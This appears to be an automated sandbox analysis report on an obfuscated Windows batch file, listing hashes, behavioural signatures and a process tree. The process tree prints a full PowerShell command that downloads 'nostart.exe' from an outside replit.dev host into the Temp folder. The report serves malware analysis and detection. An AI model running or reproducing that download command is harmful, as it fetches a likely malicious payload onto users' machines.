Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
-
submitted
09-11-2024 14:22
General
-
Target
New Text Document_obf.bat
-
Size
1KB
-
MD5
afe542deaafa2826040b1aafd7ce94bf
-
SHA1
1b34eea5ba992877fbba707f6b6320b6974b245c
-
SHA256
137771c08a3b7e830d500119028bcd379f07a1f9f59f3dd6661790c40f941524
-
SHA512
c6df2a12264e9f9ffea5e080beb9874a590a7286f43f901096b89952df534082094052ff7b79294928695af3cea1eb433a616e686e85d922e96fe649db483ff2
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Powershell Invoke Web Request.
-
Delays execution with timeout.exe 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\New Text Document_obf.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout /t 2 REM Wait for 2 seconds to simulate processing2⤵
- Delays execution with timeout.exe
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "try { Invoke-WebRequest -Uri 'https://209a4381-e3eb-466a-9efc-fca8d71e6314-00-2bl68nwmi4jw4.kirk.replit.dev/nostart.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\nostart.exe' } catch { Write-Host 'Failed to download file: $_'; exit 1 }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB